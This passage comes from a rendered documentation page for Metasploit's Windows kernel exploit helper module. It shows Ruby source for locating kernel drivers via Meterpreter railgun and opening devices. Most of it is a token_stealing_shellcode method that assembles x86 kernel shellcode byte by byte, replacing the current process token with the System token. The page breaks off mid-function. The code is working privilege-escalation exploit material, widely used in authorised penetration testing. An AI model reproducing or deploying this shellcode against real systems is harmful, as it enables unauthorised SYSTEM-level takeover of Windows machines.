<span class='kw'>unless</span> <span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>EnumDeviceDrivers failed (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GetLastError</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ErrorMessage</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_results'>results</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_psapi'>psapi</span><span class='period'>.</span><span class='const'>EnumDeviceDrivers</span><span class='lparen'>(</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>lpcbNeeded</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>lpcbNeeded</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_util'>util</span><span class='period'>.</span><span class='id identifier rubyid_pointer_size'>pointer_size</span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>EnumDeviceDrivers failed (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GetLastError</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ErrorMessage</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_addresses'>addresses</span> <span class='op'>=</span> <span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>lpImageBase</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='int'>0</span><span class='op'>..</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>lpcbNeeded</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>-</span> <span class='int'>1</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_ptr'>ptr</span><span class='embexpr_end'>}</span><span class='tstring_content'>*</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_addresses'>addresses</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_address'>address</span><span class='op'>|</span>
<span class='id identifier rubyid_results'>results</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_psapi'>psapi</span><span class='period'>.</span><span class='const'>GetDeviceDriverBaseNameA</span><span class='lparen'>(</span><span class='id identifier rubyid_address'>address</span><span class='comma'>,</span> <span class='int'>48</span><span class='comma'>,</span> <span class='int'>48</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='int'>0</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>GetDeviceDriverBaseNameA failed (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GetLastError</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ErrorMessage</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_current_drvname'>current_drvname</span> <span class='op'>=</span> <span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>lpBaseName</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='int'>0</span><span class='comma'>,</span><span class='id identifier rubyid_results'>results</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_drvname'>drvname</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='kw'>if</span> <span class='id identifier rubyid_current_drvname'>current_drvname</span><span class='period'>.</span><span class='id identifier rubyid_downcase'>downcase</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>krnl</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='id identifier rubyid_address'>address</span><span class='comma'>,</span> <span class='id identifier rubyid_current_drvname'>current_drvname</span>
<span class='kw'>end</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_drvname'>drvname</span> <span class='op'>==</span> <span class='id identifier rubyid_current_drvname'>current_drvname</span>
<span class='kw'>return</span> <span class='id identifier rubyid_address'>address</span><span class='comma'>,</span> <span class='id identifier rubyid_current_drvname'>current_drvname</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/local/windows_kernel.rb', line 8</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>super</span><span class='lparen'>(</span>
<span class='id identifier rubyid_update_info'>update_info</span><span class='lparen'>(</span>
<span class='id identifier rubyid_info'>info</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Compat</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Meterpreter</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Commands</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='qwords_beg'>%w[</span><span class='words_sep'>
</span><span class='tstring_content'>stdapi_railgun_api</span><span class='words_sep'>
</span><span class='tstring_content'>stdapi_railgun_memread</span><span class='words_sep'>
</span><span class='tstring_content'>stdapi_railgun_memwrite</span><span class='words_sep'>
</span><span class='tstring_end'>]</span></span>
<span class='rbrace'>}</span>
<span class='rbrace'>}</span>
<span class='rparen'>)</span>
<span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="open_device-instance_method">
#<strong>open_device</strong>(file_name, desired_access, share_mode, creation_disposition, flags_and_attributes = 0) &#x21d2; <tt>Integer</tt><sup>?</sup>
</h3><div class="docstring">
<div class="discussion">
<p>Open a device on a meterpreter session with a call to CreateFileA and return the handle. Both optional parameters lpSecurityAttributes and hTemplateFile are specified as nil. If CreateFileA returns INVALID_HANDLE_VALUE, the Win32 error code and message are printed and nil is returned. The returned handle is not tracked or closed by this helper: the caller owns it and should release it with CloseHandle once it is no longer needed.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>file_name</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Passed to CreateFileA as the lpFileName parameter.</p>
</div>
</li>
<li>
<span class='name'>desired_access</span>
<span class='type'>(<tt>String</tt>, <tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>Passed to CreateFileA as the dwDesiredAccess parameter.</p>
</div>
</li>
<li>
<span class='name'>share_mode</span>
<span class='type'>(<tt>String</tt>, <tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>Passed to CreateFileA as the dwShareMode parameter.</p>
</div>
</li>
<li>
<span class='name'>creation_disposition</span>
<span class='type'>(<tt>String</tt>, <tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>Passed to CreateFileA as the dwCreationDisposition parameter.</p>
</div>
</li>
<li>
<span class='name'>flags_and_attributes</span>
<span class='type'>(<tt>String</tt>, <tt>Integer</tt>)</span>
<em class="default">(defaults to: <tt>0</tt>)</em>
&mdash;
<div class='inline'>
<p>Passed to CreateFileA as the dwFlagsAndAttributes parameter.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>The device handle.</p>
</div>
</li>
<li>
<span class='type'>(<tt>nil</tt>)</span>
&mdash;
<div class='inline'>
<p>If the call to CreateFileA failed.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/local/windows_kernel.rb', line 116</span>
<span class='kw'>def</span> <span class='id identifier rubyid_open_device'>open_device</span><span class='lparen'>(</span><span class='id identifier rubyid_file_name'>file_name</span><span class='comma'>,</span> <span class='id identifier rubyid_desired_access'>desired_access</span><span class='comma'>,</span> <span class='id identifier rubyid_share_mode'>share_mode</span><span class='comma'>,</span> <span class='id identifier rubyid_creation_disposition'>creation_disposition</span><span class='comma'>,</span> <span class='id identifier rubyid_flags_and_attributes'>flags_and_attributes</span> <span class='op'>=</span> <span class='int'>0</span><span class='rparen'>)</span>
<span class='id identifier rubyid_handle'>handle</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_railgun'>railgun</span><span class='period'>.</span><span class='id identifier rubyid_kernel32'>kernel32</span><span class='period'>.</span><span class='const'>CreateFileA</span><span class='lparen'>(</span><span class='id identifier rubyid_file_name'>file_name</span><span class='comma'>,</span> <span class='id identifier rubyid_desired_access'>desired_access</span><span class='comma'>,</span> <span class='id identifier rubyid_share_mode'>share_mode</span><span class='comma'>,</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='id identifier rubyid_creation_disposition'>creation_disposition</span><span class='comma'>,</span> <span class='id identifier rubyid_flags_and_attributes'>flags_and_attributes</span><span class='comma'>,</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_handle'>handle</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../Post/Windows/Error.html#INVALID_HANDLE_VALUE-constant" title="Msf::Post::Windows::Error::INVALID_HANDLE_VALUE (constant)">INVALID_HANDLE_VALUE</a></span></span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to open the </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_file_name'>file_name</span><span class='embexpr_end'>}</span><span class='tstring_content'> device (error: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_handle'>handle</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GetLastError</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'> </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_handle'>handle</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>ErrorMessage</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>nil</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_handle'>handle</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>return</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="token_stealing_shellcode-instance_method">
#<strong>token_stealing_shellcode</strong>(target, backup_token = nil, arch = nil, append_ret = true) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Generate token stealing shellcode suitable for use when overwriting the HaliQuerySystemInformation pointer (see #hal_dispatch_table for locating it). The x86 variant pushes edx and ebx on entry so both are preserved, reads the current _ETHREAD from fs:[0x124], follows it to the _KPROCESS, loads the current token into ebx (optionally writing a copy to backup_token), then walks ActiveProcessLinks until it finds the _EPROCESS whose UniqueProcessId is 4 (the System process). The target offsets are spliced directly into the instruction displacements, so in the x86 path they must be supplied as one-byte String values rather than Integers.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>target</span>
<span class='type'>(<tt>Hash</tt>)</span>
&mdash;
<div class='inline'>
<p>The target information containing the offsets to _KPROCESS, _TOKEN, _UPID and _APLINKS. In the x86 path these values are concatenated into the instruction encoding (_KPROCESS as an 8-bit displacement, the others zero-extended to a 32-bit displacement), so each must be a one-byte String such as &quot;\x44&quot;, not an Integer. If target.opts[&#39;Arch&#39;] is set it is used as the architecture when arch is nil.</p>
</div>
</li>
<li>
<span class='name'>backup_token</span>
<span class='type'>(<tt>Integer</tt>)</span>
<em class="default">(defaults to: <tt>nil</tt>)</em>
&mdash;
<div class='inline'>
<p>An optional address to write a copy of the original token to so it can be restored later. In the x86 path this is emitted as a mov to that absolute address, so it must be writable at the time the shellcode executes.</p>
</div>
</li>
<li>
<span class='name'>arch</span>
<span class='type'>(<tt>String</tt>)</span>
<em class="default">(defaults to: <tt>nil</tt>)</em>
&mdash;
<div class='inline'>
<p>The architecture to return shellcode for. If this is nil, the arch is taken from target.opts[&#39;Arch&#39;] and, failing that, from module_info[&#39;Arch&#39;] (unwrapped when it is a single-element Array). If it still cannot be determined an error is printed and ArgumentError is raised.</p>
</div>
</li>
<li>
<span class='name'>append_ret</span>
<span class='type'>(<tt>Boolean</tt>)</span>
<em class="default">(defaults to: <tt>true</tt>)</em>
&mdash;
<div class='inline'>
<p>Append a ret instruction for use when being called in place of HaliQuerySystemInformation.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The token stealing shellcode.</p>
</div>
</li>
</ul>
<p class="tag_title">Raises:</p>
<ul class="raise">
<li>
<span class='type'>(<tt>ArgumentError</tt>)</span>
&mdash;
<div class='inline'>
<p>If the architecture cannot be determined (neither arch, target.opts[&#39;Arch&#39;] nor module_info[&#39;Arch&#39;] is set) or, presumably, if it is not one this method supports.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/local/windows_kernel.rb', line 141</span>
<span class='kw'>def</span> <span class='id identifier rubyid_token_stealing_shellcode'>token_stealing_shellcode</span><span class='lparen'>(</span><span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_backup_token'>backup_token</span> <span class='op'>=</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='id identifier rubyid_arch'>arch</span> <span class='op'>=</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='id identifier rubyid_append_ret'>append_ret</span> <span class='op'>=</span> <span class='kw'>true</span><span class='rparen'>)</span>
<span class='id identifier rubyid_arch'>arch</span> <span class='op'>=</span> <span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Arch</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='kw'>if</span> <span class='id identifier rubyid_arch'>arch</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_target'>target</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_opts'>opts</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Arch</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_arch'>arch</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_module_info'>module_info</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Arch</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_arch'>arch</span> <span class='op'>=</span> <span class='id identifier rubyid_module_info'>module_info</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Arch</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_arch'>arch</span> <span class='op'>=</span> <span class='id identifier rubyid_arch'>arch</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span> <span class='kw'>if</span> <span class='id identifier rubyid_arch'>arch</span><span class='period'>.</span><span class='id identifier rubyid_is_a?'>is_a?</span><span class='lparen'>(</span><span class='const'>Array</span><span class='rparen'>)</span> <span class='kw'>and</span> <span class='id identifier rubyid_arch'>arch</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>==</span> <span class='int'>1</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_arch'>arch</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Can not determine the target architecture</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_fail'>fail</span> <span class='const'>ArgumentError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Invalid arch</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>case</span> <span class='id identifier rubyid_arch'>arch</span>
<span class='kw'>when</span> <span class='const'>ARCH_X86</span>
<span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x52</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># push edx # Save edx on the stack
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x53</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># push ebx # Save ebx on the stack
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x33\xc0</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># xor eax, eax # eax = 0
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x64\x8b\x80\x24\x01\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x8b\x40</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_KPROCESS</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='comment'># mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x8b\xc8</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov ecx, eax
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x8b\x98</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_TOKEN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
</span> <span class='kw'>unless</span> <span class='id identifier rubyid_backup_token'>backup_token</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x89\x1d</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='lbracket'>[</span><span class='id identifier rubyid_backup_token'>backup_token</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_pack'>pack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>V</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='comment'># mov dword ptr ds:backup_token, ebx # Optionally write a copy of the token to the address provided
</span> <span class='kw'>end</span>
<span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x8b\x80</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_APLINKS</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov eax, dword ptr [eax+88h] &lt;====| # Retrieve FLINK from ActiveProcessLinks
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x81\xe8</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_APLINKS</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># sub eax, 88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x81\xb8</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_UPID</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00\x00\x00\x04\x00\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x75\xe8</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># jne 0000101e ======================|
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x8b\x90</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_TOKEN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov edx, dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x8b\xc1</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov eax, ecx # Retrieves KPROCESS stored on ECX
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x89\x90</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_target'>target</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>_TOKEN</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00\x00\x00</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
</span> <span class='id identifier rubyid_tokenstealing'>tokenstealing</span> <span class='op'>&lt;&lt;</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x5b</span><span class='tstring_end'>&quot;</span></span> <span class='comment'># pop ebx # Restores ebx
